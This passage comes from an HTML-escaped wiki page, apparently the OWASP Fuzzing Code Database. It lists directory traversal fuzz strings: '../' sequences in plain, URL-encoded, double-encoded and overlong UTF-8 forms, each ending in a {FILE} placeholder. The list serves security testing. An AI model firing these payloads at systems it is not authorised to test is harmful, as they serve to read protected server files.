/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
